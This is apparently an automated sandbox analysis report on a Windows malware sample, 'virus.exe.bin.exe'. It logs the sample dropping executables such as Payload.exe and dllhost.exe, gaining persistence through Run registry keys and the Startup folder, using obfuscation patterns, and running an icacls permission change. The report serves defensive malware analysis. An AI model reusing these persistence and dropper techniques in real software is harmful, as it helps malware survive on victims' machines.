Source: final.exe.2.dr, Module1.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: Payload.exe.11.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 11.2.final.exe.3758448.0.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])

Binary contains a suspicious time stamp

Source: virus.exe.bin.exe

Static PE information: 0xE2E5C912 [Fri Aug 18 03:27:14 2090 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF8876B20FA pushad ; retf	9_2_00007FF8876B23F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF88778343D pushfd ; iretd	9_2_00007FF88778343E
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_15389F48 push eax; retf	12_3_15389F49
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_15387F97 push A0153CC1h; ret	12_3_15387FA1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_15389F80 pushad ; iretd	12_3_15389F81
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_1537D070 push 685018C3h; ret	12_3_1537D076
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_1537D67C pushad ; ret	12_3_1537D67D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_1537D678 pushad ; ret	12_3_1537D679
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_1537D078 push 685018C3h; ret	12_3_1537D07E
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_1537D090 push 2AE018C3h; ret	12_3_1537D096
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_1537D684 pushad ; ret	12_3_1537D685
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_1537D680 pushad ; ret	12_3_1537D681
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_1537D080 push 685018C3h; ret	12_3_1537D086
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_1537D088 push 685018C3h; ret	12_3_1537D08E
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_1537D0E9 push 685018C3h; ret	12_3_1537D076
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_153BC312 pushad ; ret	12_3_153BC319
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_153BC312 pushad ; ret	12_3_153BC319
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_153BC312 pushad ; ret	12_3_153BC319
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_153BC312 pushad ; ret	12_3_153BC319
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_3_153BC312 pushad ; ret	12_3_153BC319
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_023C8A11 push cs; retf	12_2_023C8A31
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_023D083C push ds; retn 0000h	12_2_023D08A6
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_023CDD1D push es; retn 0029h	12_2_023CDD53
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_0232D8F7 push 00000000h; mov dword ptr [esp], esp	12_2_0232D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_0232A21B push ecx; ret	12_2_0232A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_0232A20A push ecx; ret	12_2_0232A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_0232BB67 push 00000000h; mov dword ptr [esp], esp	12_2_0232BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_0232B3B7 push 00000000h; mov dword ptr [esp], esp	12_2_0232B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_0232D8E0 push 00000000h; mov dword ptr [esp], esp	12_2_0232D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_0232B947 push 00000000h; mov dword ptr [esp], esp	12_2_0232B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 12_2_0232C477 push 00000000h; mov dword ptr [esp], esp	12_2_0232C49D

Drops PE files

Source: C:\Users\user\AppData\Roaming\dllhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	File created: C:\Users\user\AppData\Roaming\dllhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	File created: C:\ClickMe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\virus.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Roaming\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Roaming\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe

Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Stores large binary data to the registry

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\c382eb151c59bd833b24120723eac541 f55ab6fb12b43f7934c631eabc315fb4

Uses cacls to modify the permissions of files

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
